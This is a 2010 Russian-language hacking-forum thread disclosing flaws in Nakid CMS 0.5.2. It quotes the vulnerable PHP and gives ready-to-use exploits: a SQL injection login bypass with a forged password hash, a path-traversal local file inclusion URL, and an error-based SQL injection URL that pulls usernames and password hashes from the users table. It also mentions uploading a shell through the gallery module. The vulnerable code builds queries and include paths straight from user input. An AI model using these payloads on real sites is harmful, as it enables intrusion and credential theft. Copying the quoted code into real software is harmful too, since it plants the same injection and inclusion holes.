Nakid CMS 0.5.2

Discussion in 'Веб-уязвимости' started by geezer.code, 20 Mar 2010.

  1. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    NakidCMS 0.5.2

    Обход Авторизации && Blind SQLi
    login_process.php
    mq=off
    PHP:
    $post_username $_POST['username'];
    $post_password md5($_POST['password']);
    $users_query mysql_query("SELECT id,password FROM ".$system_table_prefix."users WHERE username = '".$post_username."' LIMIT 1") or die("<p class='error'>Error: ".mysql_error()."</p>");
    if(    mysql_num_rows($users_query)<1){
      die(    "<p class='error'>No such user found</p>");
    }
    $users_array mysql_fetch_array($users_query);
    if(    $post_password != $users_array['password']){
      die(    "<p class='error'>Invalid Password</p>");
    }
    $_SESSION['uid'] = $users_array['id'];
    echo(    "Redirecting to home page, if you are not redirected <a href='index.php'>click here</a>");
    redirect_page("index.php?p=home");
    Exploit:
    Code:
    index.php?p=login_process
POST
username=' union select 1 id,'9003d1df22eb4d3820015070385194c8' password#
password=pwd
    P.S.
    Заливка шелла через модуль галереи.
     
    #1 geezer.code, 20 Mar 2010
    Last edited: 20 Mar 2010
    10 people like this.
  2. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    Local File Inclusion

    Vuln file: /index.php
    Code:
    file:/includes/php/first.php
/*...*/
//Get Current Page
if(!empty($_GET['p'])){
	$core['page'] = strtolower($_GET['p']);
}
if(!empty($_GET['pt'])){
	$core['page_type'] = strtolower($_GET['pt']);
}
/*...*/
			if($core['page_type'] == "core"){
				$page_string = "includes/pages/".$core['page'].".php";
				if(file_exists($page_string)){
					include($page_string);
					$page_found = true;
				}
			}
/*...*/
    Need: magic_quotes = off
    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/index.php?pt=core&p=[COLOR=White]../../../../../../../[/COLOR][COLOR=Green][local_file][/COLOR][COLOR=White]%00[/COLOR]
    Blind SQL injection

    Vuln file: /includes/pages/users_data.php
    Code:
    /*...*/
$page = $_GET['page'];   //Requested page
$limit = $_GET['rows'];  //Num of rows
$sidx = $_GET['sidx'];   //Sort by
$sord = $_GET['sord'];   //Sort order
/*...*/
	$SQL = "SELECT * FROM ".$core['table_prefix']."users";
/*...*/
	if(!empty($sidx)){
		$SQL .= " ORDER BY ".$sidx." ".$sord;
	}
/*...*/
    Exploit:
    Code:
    http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/includes/pages/users_data.php?sidx=1[COLOR=White]+and+(1,2)=(select+*+from(select+name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1),name_const((select+concat_ws(0x3a,username,password)+from+nakid_users+where+id=1),1))x)[/COLOR]
     
    #2 RulleR, 20 Mar 2010
    8 people like this.
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    слив РОА
     
    #3 Kakoytoxaker, 23 Apr 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.